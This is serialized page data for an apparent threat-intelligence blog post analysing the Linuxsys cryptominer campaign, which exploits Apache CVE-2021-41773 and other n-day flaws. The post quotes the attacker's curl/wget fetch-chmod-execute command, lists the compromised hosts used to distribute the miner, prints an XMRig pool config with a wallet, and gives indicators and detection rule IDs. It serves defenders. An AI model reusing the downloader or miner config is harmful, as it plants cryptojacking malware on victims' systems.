34,39435,10515,39439],{},[47,39436,39437],{"href":39437,"rel":39438},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmap\u002F?day=2025-07-17&host_type=src&vulnerability=cve-2021-36260",[51],[47,39440,36677],{"href":36722},[25,39442,39443,10515,39446],{},[47,39444,37718],{"href":37718,"rel":39445},[51],[47,39447,36677],{"href":39448},"#user-content-fnref-7",[25,39450,39451,10515,39455],{},[47,39452,39453],{"href":39453,"rel":39454},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F16204\u002Ffiles#diff-6bb892f1499191dd276796704d22749899d3d7440f51ddc5357ac177ee76b9ab",[51],[47,39456,36677],{"href":39457},"#user-content-fnref-8",[25,39459,39460,10515,39464],{},[47,39461,39462],{"href":39462,"rel":39463},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fmount\u002F",[51],[47,39465,36677],{"href":39466},"#user-content-fnref-9",[25,39468,39469,10515,39473],{},[47,39470,39471],{"href":39471,"rel":39472},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FPortmap",[51],[47,39474,36677],{"href":39475},"#user-content-fnref-10",[25,39477,39478,10515,39482],{},[47,39479,39480],{"href":39480,"rel":39481},"https:\u002F\u002Fgithub.com\u002Ftravisbgreen\u002Fhunting-rules\u002Fblob\u002Fmaster\u002Fhunting.rules#L472",[51],[47,39483,36677],{"href":39484},"#user-content-fnref-11",[25,39486,39487,10515,39491],{},[47,39488,39489],{"href":39489,"rel":39490},"https:\u002F\u002Frules.emergingthreats.net\u002Fopen\u002Fsuricata-6.0\u002Femerging-all.rules",[51],[47,39492,36677],{"href":39493},"#user-content-fnref-12",[25,39495,39496,10515,39500],{},[47,39497,39498],{"href":39498,"rel":39499},"https:\u002F\u002Fgithub.com\u002Fwillscott\u002Fgo-nfs",[51],[47,39501,36677],{"href":39502},"#user-content-fnref-13",[25,39504,39505,10515,39509],{},[47,39506,39507],{"href":39507,"rel":39508},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F87.121.84.34",[51],[47,39510,36677],{"href":39511},"#user-content-fnref-14",[25,39513,39514,10515,39518],{},[47,39515,39516],{"href":39516,"rel":39517},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F195.3.221.137",[51],[47,39519,36677],{"href":39520},"#user-content-fnref-15",[25,39522,39523,10515,39527],{},[47,39524,39525],{"href":39525,"rel":39526},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F141.11.62.222",[51],[47,39528,36677],{"href":39529},"#user-content-fnref-16",[25,39531,39532,10515,39536],{},[47,39533,39534],{"href":39534,"rel":39535},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F48d2c2c68fa0bd44eb70c1a6cf572406442b289fb6030e946f0530ce6f9fad98",[51],[47,39537,36677],{"href":39538},"#user-content-fnref-17",[2901,39540,39541],{},"html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":39543},[39544,39545,39546,39547],{"id":39302,"depth":220,"text":39303},{"id":39311,"depth":220,"text":39312},{"id":39332,"depth":220,"text":39333},{"id":36664,"depth":220,"text":36665},"2025-07-24","VulnCheck researchers spotted a novel use of the \"mount\" command in real-world exploitation of Hikvision CVE-2021-36260. The attacker used NFS to drop and execute binaries, bypassing traditional download methods and evading common detection signatures. This technique has since been integrated into VulnCheck’s open-source go-exploit framework.",{"slug":39551},"hikvision-mount-shell","\u002Fblog\u002Fhikvision-mount-shell",{"title":35917,"description":39549},"blog\u002Fhikvision-mount-shell",[2941,242,1281,23275,1279],"Y5dkSO1JN4KHDuaGecB9e_iBYgx97hokLk8kFAhGf9Y",{"id":39558,"title":36760,"articles":39559,"authors":39582,"body":39584,"date":39563,"description":40489,"extension":234,"image":7,"link":7,"meta":40490,"navigation":237,"path":40492,"seo":40493,"series":7,"stem":40494,"subtype":7,"tags":40495,"__hash__":40496},"blog\u002Fblog\u002Flinuxsys-cryptominer.md",[39560,39564,39568,39572,39575,39578],{"title":39561,"source":14382,"link":39562,"date":39563},"Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner","https:\u002F\u002Fthehackernews.com\u002F2025\u002F07\u002Fhackers-exploit-apache-http-server-flaw.html","2025-07-17",{"title":39565,"source":39566,"link":39567,"date":39563},"Law enforcement disrupts pro-Russian hacker group","The CyberWire","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F14\u002F135",{"title":39569,"source":12153,"link":39570,"date":39571},"Apache HTTP Server, Exchange Server exploits used for cryptominer, backdoor deployment","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fapache-http-server-exchange-server-exploits-used-for-cryptominer-backdoor-deployment","2025-07-18",{"title":39573,"source":12145,"link":39574,"date":39571},"Years Long Linux Cryptominer Spotted Using Legit Sites to Spread Malware","https:\u002F\u002Fhackread.com\u002Flinux-cryptominer-using-legit-sites-to-spread-malware\u002F",{"title":39576,"source":12157,"link":39577,"date":39571},"Risky Bulletin: New phishing technique bypasses FIDO keys - Risky Business Media","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-new-phishing-technique-bypasses-fido-keys\u002F",{"title":39579,"source":39580,"link":39581,"date":39571},"Apache HTTP Server, Exchange Server Exploits Used for Cryptominer, Backdoor Deployment","SC Magazine UK","https:\u002F\u002Finsight.scmagazineuk.com\u002Fapache-http-server-exchange-server-exploits-used-for-cryptominer-backdoor-deployment",[39583],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":39585,"toc":40482},[39586,39589,39591,39608,39611,39615,39621,39627,39641,39649,39795,39798,39825,39839,39845,39855,40102,40111,40115,40144,40151,40221,40242,40254,40259,40262,40265,40267,40272,40334,40336,40338,40346,40350,40358,40362,40384,40386,40427,40431,40437,40439,40463,40477,40479],[263,39587],{":list":39588,"ico":266,"title":20},"[\"The Linuxsys cryptominer has been part of a long-running campaign exploiting multiple vulnerabilities with a consistent attacker methodology since at least 2021.\",\"The attacker leverages compromised legitimate websites to distribute malware, enabling stealthy delivery and evasion of detection.\",\"VulnCheck customers can detect these attacks using our Initial Access Intelligence Suricata and Snort rules.\",\"Additional indicators of compromise are provided to help defenders identify and respond to related threats.\"]",[1920,39590,11648],{"id":11647},[18,39592,14428,39593,39597,39598,39602,39603,39607],{},[47,39594,1514],{"href":39595,"rel":39596},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-41773",[51]," in the wild. This, in itself, is hardly noteworthy. The vulnerability was an inaugural member of both the CISA KEV and ",[47,39599,1233],{"href":39600,"rel":39601},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev",[51],". Our friends over at ",[47,39604,11029],{"href":39605,"rel":39606},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fapache-http-server-path-traversal-attempt?days=1",[51]," still see exploit attempts for this vulnerability a couple of dozen times each day. The noteworthy part is who was doing the exploiting.",[18,39609,39610],{},"To understand that, let’s look at how the attacks were carried out.",[1920,39612,39614],{"id":39613},"exploitation-methodology","Exploitation Methodology",[18,39616,39617,39618,39620],{},"Between July 1 and July 16, 2025, we observed IP address 103.193.177",[1373,39619,59],{},"152 repeatedly attempting to exploit our Apache 2.4.49 canary.",[18,39622,39623],{},[68,39624],{":width":10862,"alt":39625,"src":39626},"Linuxsys exploit attempt","\u002Fblog\u002Flinuxsys-cryptominer\u002Fexploit-pcap.png",[18,39628,39629,39630,1554,39632,39634,39635,39638,39639,59],{},"Exploitation is straightforward. The attacker attempts to use either ",[886,39631,1557],{},[886,39633,1553],{}," to download a file from ",[886,39636,39637],{},"repositorylinux[.]org",". The domain was registered a year ago and was likely placed behind Cloudflare in January 2025. According to ICANN records, that was the domain’s last update, which corresponds with the earliest public analysis we found on Joe Sandbox",[1373,39640,34237],{},[18,39642,2245,39643,39646,39648],{},[886,39644,39645],{},"linux.sh",[1373,39647,34289],{}," script is interesting. It attempts to download a configuration file and coinminer (linuxsys) from five different compromised hosts before exiting. The download attempt looks like:",[1354,39650,39652],{"className":31740,"code":39651,"language":2186,"meta":219,"style":219},"cd .\u002F; curl -s --connect-timeout 10 \u003Ccompromised>\u002Fconfig.json -k -o config.json || wget -q -O config.json \u003Ccompromised>\u002Fconfig.json --timeout=10 --tries=3 --no-check-certificate; curl -s --connect-timeout 10 \u003Ccompromised>\u002Fapp\u002Flinux.bin -k -o linuxsys || wget -q -O linuxsys \u003Ccompromised>\u002Flinux.bin --timeout=10 --tries=3 --no-check-certificate; chmod +x linuxsys; .\u002Flinuxsys\n",[886,39653,39654],{"__ignoreMap":219},[1373,39655,39656,39658,39661,39664,39666,39668,39671,39674,39676,39679,39682,39684,39687,39690,39693,39696,39698,39701,39703,39706,39708,39710,39712,39714,39716,39718,39721,39724,39726,39728,39730,39732,39734,39736,39738,39740,39742,39744,39747,39749,39751,39754,39756,39758,39760,39762,39764,39766,39768,39770,39772,39775,39777,39779,39781,39783,39786,39788,39790,39792],{"class":1375,"line":1376},[1373,39657,21460],{"class":1379},[1373,39659,39660],{"class":1391}," .\u002F",[1373,39662,39663],{"class":1383},";",[1373,39665,2222],{"class":2206},[1373,39667,2239],{"class":2209},[1373,39669,39670],{"class":2209}," --connect-timeout",[1373,39672,39673],{"class":5467}," 10",[1373,39675,27250],{"class":1397},[1373,39677,39678],{"class":1391},"compromise",[1373,39680,39681],{"class":4640},"d",[1373,39683,5384],{"class":1397},[1373,39685,39686],{"class":1391},"\u002Fconfig.json",[1373,39688,39689],{"class":2209}," -k",[1373,39691,39692],{"class":2209}," -o",[1373,39694,39695],{"class":1391}," config.json",[1373,39697,2219],{"class":1397},[1373,39699,39700],{"class":2206}," wget",[1373,39702,31882],{"class":2209},[1373,39704,39705],{"class":2209}," -O",[1373,39707,39695],{"class":1391},[1373,39709,27250],{"class":1397},[1373,39711,39678],{"class":1391},[1373,39713,39681],{"class":4640},[1373,39715,5384],{"class":1397},[1373,39717,39686],{"class":1391},[1373,39719,39720],{"class":2209}," --timeout=10",[1373,39722,39723],{"class":2209}," --tries=3",[1373,39725,2210],{"class":2209},[1373,39727,39663],{"class":1383},[1373,39729,2222],{"class":2206},[1373,39731,2239],{"class":2209},[1373,39733,39670],{"class":2209},[1373,39735,39673],{"class":5467},[1373,39737,27250],{"class":1397},[1373,39739,39678],{"class":1391},[1373,39741,39681],{"class":4640},[1373,39743,5384],{"class":1397},[1373,39745,39746],{"class":1391},"\u002Fapp\u002Flinux.bin",[1373,39748,39689],{"class":2209},[1373,39750,39692],{"class":2209},[1373,39752,39753],{"class":1391}," linuxsys",[1373,39755,2219],{"class":1397},[1373,39757,39700],{"class":2206},[1373,39759,31882],{"class":2209},[1373,39761,39705],{"class":2209},[1373,39763,39753],{"class":1391},[1373,39765,27250],{"class":1397},[1373,39767,39678],{"class":1391},[1373,39769,39681],{"class":4640},[1373,39771,5384],{"class":1397},[1373,39773,39774],{"class":1391},"\u002Flinux.bin",[1373,39776,39720],{"class":2209},[1373,39778,39723],{"class":2209},[1373,39780,2210],{"class":2209},[1373,39782,39663],{"class":1383},[1373,39784,39785],{"class":2206}," chmod",[1373,39787,31893],{"class":1391},[1373,39789,39753],{"class":1391},[1373,39791,39663],{"class":1383},[1373,39793,39794],{"class":2206}," .\u002Flinuxsys\n",[18,39796,39797],{},"The current iteration of the script uses the following list of compromised hosts:",[22,39799,39800,39805,39810,39815,39820],{},[25,39801,39802],{},[886,39803,39804],{},"https:\u002F\u002Fprepstarcenter[.]com\u002Fapp\u002F",[25,39806,39807],{},[886,39808,39809],{},"https:\u002F\u002Fwisecode[.]it\u002Fapp\u002F",[25,39811,39812],{},[886,39813,39814],{},"https:\u002F\u002Fdodoma[.]shop\u002Fwp-content\u002Fuploads\u002F2000\u002F01\u002F",[25,39816,39817],{},[886,39818,39819],{},"https:\u002F\u002Fportailimmersion[.]ca\u002Fwp-content\u002Fuploads\u002F",[25,39821,39822],{},[886,39823,39824],{},"https:\u002F\u002Ftest.anepf[.]org\u002Fcss\u002F",[18,39826,39827,39828,39831,39832,982,39835,39838],{},"Also hosted on these victims is ",[886,39829,39830],{},"cron.sh",", which ensures the coinminer restarts on reboot, and two Windows executables (",[886,39833,39834],{},"nssm.exe",[886,39836,39837],{},"winsys.exe","). That suggests there is a Windows component to this operation, but we did not observe it in action.",[18,39840,39841,39842,39844],{},"All of these appear to be legitimate sites, suggesting the attacker is compromising third-party systems to distribute the miner and configuration files. This approach is clever because victims connect to legitimate hosts with valid SSL certificates, making detection less likely. Additionally, it provides a layer of separation for the downloader site (",[886,39843,39637],{},") since the malware itself isn’t hosted there.",[18,39846,39847,39848,39850,39851,39854],{},"Grabbing the config file from one of the victims, we find standard XMRig data. The current config iteration",[1373,39849,34293],{}," points to ",[886,39852,39853],{},"hashvault.pro"," as the mining pool.",[1354,39856,39858],{"className":22307,"code":39857,"language":22309,"meta":219,"style":219}," \"pools\": [\n {\n \"algo\": null,\n \"coin\": null,\n \"url\": \"pool.hashvault.pro:443\",\n \"user\": \"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+72000\",\n \"pass\": \"lucifer\",\n \"rig-id\": null,\n \"nicehash\": false,\n \"keepalive\": true,\n \"enabled\": true,\n \"tls\": true,\n \"tls-fingerprint\": \"420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14\",\n \"daemon\": false,\n \"self-select\": null\n }\n ],\n",[886,39859,39860,39873,39877,39893,39908,39927,39947,39967,39982,39997,40012,40027,40042,40062,40077,40091,40095],{"__ignoreMap":219},[1373,39861,39862,39864,39867,39869,39871],{"class":1375,"line":1376},[1373,39863,23732],{"class":1387},[1373,39865,39866],{"class":1391},"pools",[1373,39868,183],{"class":1387},[1373,39870,20051],{"class":4640},[1373,39872,9050],{"class":1383},[1373,39874,39875],{"class":1375,"line":220},[1373,39876,4765],{"class":1383},[1373,39878,39879,39882,39885,39887,39889,39891],{"class":1375,"line":1266},[1373,39880,39881],{"class":9152}," \"",[1373,39883,39884],{"class":9155},"algo",[1373,39886,183],{"class":9152},[1373,39888,4606],{"class":1383},[1373,39890,15680],{"class":7054},[1373,39892,9062],{"class":1383},[1373,39894,39895,39897,39900,39902,39904,39906],{"class":1375,"line":1852},[1373,39896,39881],{"class":9152},[1373,39898,39899],{"class":9155},"coin",[1373,39901,183],{"class":9152},[1373,39903,4606],{"class":1383},[1373,39905,15680],{"class":7054},[1373,39907,9062],{"class":1383},[1373,39909,39910,39912,39914,39916,39918,39920,39923,39925],{"class":1375,"line":4692},[1373,39911,39881],{"class":9152},[1373,39913,7585],{"class":9155},[1373,39915,183],{"class":9152},[1373,39917,4606],{"class":1383},[1373,39919,4883],{"class":9173},[1373,39921,39922],{"class":9176},"pool.hashvault.pro:443",[1373,39924,183],{"class":9173},[1373,39926,9062],{"class":1383},[1373,39928,39929,39931,39934,39936,39938,39940,39943,39945],{"class":1375,"line":4724},[1373,39930,39881],{"class":9152},[1373,39932,39933],{"class":9155},"user",[1373,39935,183],{"class":9152},[1373,39937,4606],{"class":1383},[1373,39939,4883],{"class":9173},[1373,39941,39942],{"class":9176},"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+72000",[1373,39944,183],{"class":9173},[1373,39946,9062],{"class":1383},[1373,39948,39949,39951,39954,39956,39958,39960,39963,39965],{"class":1375,"line":4756},[1373,39950,39881],{"class":9152},[1373,39952,39953],{"class":9155},"pass",[1373,39955,183],{"class":9152},[1373,39957,4606],{"class":1383},[1373,39959,4883],{"class":9173},[1373,39961,39962],{"class":9176},"lucifer",[1373,39964,183],{"class":9173},[1373,39966,9062],{"class":1383},[1373,39968,39969,39971,39974,39976,39978,39980],{"class":1375,"line":4768},[1373,39970,39881],{"class":9152},[1373,39972,39973],{"class":9155},"rig-id",[1373,39975,183],{"class":9152},[1373,39977,4606],{"class":1383},[1373,39979,15680],{"class":7054},[1373,39981,9062],{"class":1383},[1373,39983,39984,39986,39989,39991,39993,39995],{"class":1375,"line":4792},[1373,39985,39881],{"class":9152},[1373,39987,39988],{"class":9155},"nicehash",[1373,39990,183],{"class":9152},[1373,39992,4606],{"class":1383},[1373,39994,16311],{"class":7054},[1373,39996,9062],{"class":1383},[1373,39998,39999,40001,40004,40006,40008,40010],{"class":1375,"line":4798},[1373,40000,39881],{"class":9152},[1373,40002,40003],{"class":9155},"keepalive",[1373,40005,183],{"class":9152},[1373,40007,4606],{"class":1383},[1373,40009,14986],{"class":7054},[1373,40011,9062],{"class":1383},[1373,40013,40014,40016,40019,40021,40023,40025],{"class":1375,"line":4806},[1373,40015,39881],{"class":9152},[1373,40017,40018],{"class":9155},"enabled",[1373,40020,183],{"class":9152},[1373,40022,4606],{"class":1383},[1373,40024,14986],{"class":7054},[1373,40026,9062],{"class":1383},[1373,40028,40029,40031,40034,40036,40038,40040],{"class":1375,"line":4817},[1373,40030,39881],{"class":9152},[1373,40032,40033],{"class":9155},"tls",[1373,40035,183],{"class":9152},[1373,40037,4606],{"class":1383},[1373,40039,14986],{"class":7054},[1373,40041,9062],{"class":1383},[1373,40043,40044,40046,40049,40051,40053,40055,40058,40060],{"class":1375,"line":4825},[1373,40045,39881],{"class":9152},[1373,40047,40048],{"class":9155},"tls-fingerprint",[1373,40050,183],{"class":9152},[1373,40052,4606],{"class":1383},[1373,40054,4883],{"class":9173},[1373,40056,40057],{"class":9176},"420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",[1373,40059,183],{"class":9173},[1373,40061,9062],{"class":1383},[1373,40063,40064,40066,40069,40071,40073,40075],{"class":1375,"line":4835},[1373,40065,39881],{"class":9152},[1373,40067,40068],{"class":9155},"daemon",[1373,40070,183],{"class":9152},[1373,40072,4606],{"class":1383},[1373,40074,16311],{"class":7054},[1373,40076,9062],{"class":1383},[1373,40078,40079,40081,40084,40086,40088],{"class":1375,"line":4843},[1373,40080,39881],{"class":9152},[1373,40082,40083],{"class":9155},"self-select",[1373,40085,183],{"class":9152},[1373,40087,4606],{"class":1383},[1373,40089,40090],{"class":7054}," null\n",[1373,40092,40093],{"class":1375,"line":4849},[1373,40094,35334],{"class":1383},[1373,40096,40097,40100],{"class":1375,"line":4877},[1373,40098,40099],{"class":1383}," ]",[1373,40101,9062],{"class":4640},[18,40103,40104,40105,982,40107,40110],{},"Examining the wallet shows two active workers, named ",[1131,40106,39962],{},[1131,40108,40109],{},"baphomet",", totaling roughly 400 workers (read: victims). The wallet has been receiving payouts since January 2025 but has only accrued about 0.024 XMR per day over that timeframe, roughly $8 per day. This suggests a very small-scale operation that might not be worth noticing. However, there is more to uncover.",[1920,40112,40114],{"id":40113},"history-of-linuxsys","History of Linuxsys",[18,40116,40117,40118,40121,40122,40125,40127,40128,982,40130,40132,40133,982,40136,40139,40140,40143],{},"The first mention of Linuxsys in the security realm appears in Hal Pomeranz’s blog, which discusses payloads for ",[47,40119,1514],{"href":39595,"rel":40120},[51],". The blog, titled ",[1131,40123,40124],{},"Hudak’s Honeypot (Part 4)",[1373,40126,34329],{},", was published in December 2021. Linuxsys makes an appearance towards the end of the blog, where Hal presents snippets from ",[886,40129,39830],{},[886,40131,39645],{},". We can even see that the attacker was hosting ",[886,40134,40135],{},"config.json",[886,40137,40138],{},"linuxsys"," on a legitimate WordPress site (",[886,40141,40142],{},"http:\u002F\u002Fshumoizolyaciya.12volt[.]ua","). Essentially, the attacker has employed the exact same methodology for the last four years.",[18,40145,40146,40147,40150],{},"Linuxsys isn’t only associated with ",[47,40148,1514],{"href":39595,"rel":40149},[51],". Over the past few years, several security companies have mentioned the attacker using different vulnerabilities.",[22,40152,40153,40169,40179,40189,40206],{},[25,40154,40155,40156,40158,40159,982,40164,59],{},"Darktrace",[1373,40157,34352],{}," associates the attacker’s methodology with ",[47,40160,40163],{"href":40161,"rel":40162},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-0012",[51],"CVE-2024-0012",[47,40165,40168],{"href":40166,"rel":40167},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-9474",[51],"CVE-2024-9474",[25,40170,10492,40171,40173,40174,59],{},[1373,40172,34447],{}," associates the attacker with ",[47,40175,40178],{"href":40176,"rel":40177},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-36401",[51],"CVE-2024-36401",[25,40180,40181,40182,40185,40186,59],{},"TrendMicro",[1373,40183,40184],{},"^7"," associates the attacker with exploitation of ",[47,40187,22217],{"href":22215,"rel":40188},[51],[25,40190,40191,40192,40185,40195,40200,40201,40205],{},"Imunify Security",[1373,40193,40194],{},"^8",[47,40196,40199],{"href":40197,"rel":40198},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-34960",[51],"CVE-2023-34960",". This vulnerability is not listed in CISA KEV but has been in ",[47,40202,1233],{"href":40203,"rel":40204},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-34960",[51]," since June 2023.",[25,40207,11029,40208,40211,40212,40215,40216,40220],{},[1373,40209,40210],{},"^9"," appears to associate the attacking IP with ",[47,40213,10435],{"href":10433,"rel":40214},[51],". This vulnerability, affecting Metabase, is also missing from CISA KEV, but has been in ",[47,40217,1233],{"href":40218,"rel":40219},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-38646",[51]," since November 2023.",[18,40222,40223,40224,40227,40228,40231,40232,40234,40235,40238,40239,40241],{},"Additionally, there have been Stack Exchange",[1373,40225,40226],{},"^10"," and Reddit",[1373,40229,40230],{},"^11"," posts demonstrating exploitation by the attacker (at least, using the ",[886,40233,40138],{}," name). QianXin",[1373,40236,40237],{},"^12"," documented Returned Libra (aka 8220 Mining Group) looking for ",[886,40240,40138],{}," on hosts in order to kill it off.",[18,40243,40244,40245,40248,40249,40251,40252],{},"If we look up the hash",[1373,40246,40247],{},"^13"," of the ",[886,40250,40138],{}," hosted on the victim sites, we can also see that VirusTotal has ~40 variations of the ",[886,40253,39645],{},[18,40255,40256],{},[68,40257],{":width":10862,"alt":39625,"src":40258},"\u002Fblog\u002Flinuxsys-cryptominer\u002Fvirustotal-parents.png",[18,40260,40261],{},"All of this indicates that the attacker has been conducting a long-term campaign, employing consistent techniques such as n-day exploitation, staging content on compromised hosts, and coin mining on victim machines. This campaign has persisted for an extended period, achieving moderate success.",[18,40263,40264],{},"Part of their success comes from careful targeting. They appear to avoid low interaction honeypots and require high interaction to observe their activity. Combined with the use of compromised hosts for malware distribution, this approach has largely helped the attacker avoid scrutiny. We assume that the miner is operating in more pools than the one we observed, as this seems like a considerable amount of work for such a low payout; however, we don’t have conclusive evidence for that.",[1920,40266,39270],{"id":39269},[18,40268,32391,40269,39276],{},[47,40270,1245],{"href":1243,"rel":40271},[51],[307,40273,40274,40283],{},[310,40275,40276],{},[313,40277,40278,40280],{},[316,40279,319],{},[316,40281,40282],{},"VulnCheck SIDS",[336,40284,40285,40292,40299,40306,40313,40320,40327],{},[313,40286,40287,40289],{},[341,40288,1514],{},[341,40290,40291],{},"12700024",[313,40293,40294,40296],{},[341,40295,22217],{},[341,40297,40298],{},"12700246, 12700258, 12700259",[313,40300,40301,40303],{},[341,40302,40199],{},[341,40304,40305],{},"12700176",[313,40307,40308,40310],{},[341,40309,10435],{},[341,40311,40312],{},"12700180",[313,40314,40315,40317],{},[341,40316,40163],{},[341,40318,40319],{},"12700421",[313,40321,40322,40324],{},[341,40323,40168],{},[341,40325,40326],{},"12700422",[313,40328,40329,40331],{},[341,40330,40178],{},[341,40332,40333],{},"12700320",[18,40335,39299],{},[993,40337,39303],{"id":39302},[22,40339,40340],{},[25,40341,40342,40343,40345],{},"103.193.177",[1373,40344,59],{},"152",[993,40347,40349],{"id":40348},"initial-bash-script-linuxsh-distribution","Initial bash script (linux.sh) distribution",[22,40351,40352],{},[25,40353,40354,40355,40357],{},"repositorylinux",[1373,40356,59],{},"org",[993,40359,40361],{"id":40360},"compromised-hosts-distributing-configurations-and-xmrig-variants","Compromised hosts distributing configurations and XMRig 